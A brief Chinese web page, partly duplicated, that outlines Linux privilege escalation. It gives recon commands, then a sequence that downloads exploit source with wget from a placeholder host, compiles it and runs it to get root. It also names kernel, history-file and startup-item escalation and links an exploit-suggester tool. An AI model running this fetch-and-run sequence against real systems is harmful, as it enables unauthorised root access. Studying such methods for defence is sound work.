1 Linux提权方法分析
2 命令:
uname -an
id
pwd
cat /etc/issue
wget http://exp/exp.c
gcc -o exp exp.c
chmod +x exp
./exp
.....到root
linux提权分析工具
https://github.com/mzet-/linux-exploit-suggester
linux提权方法
内核提权
历史纪录提权
启动项提权
uname -an
id
pwd
cat /etc/issue
wget http://exp/exp.c
gcc -o exp exp.c
chmod +x exp
./exp
.....到root
https://github.com/mzet-/linux-exploit-suggester
内核提权
历史纪录提权
启动项提权
本文标题:linux操作系统提权
本文链接:https://www.haomeiwen.com/subject/vksygftx.html
网友评论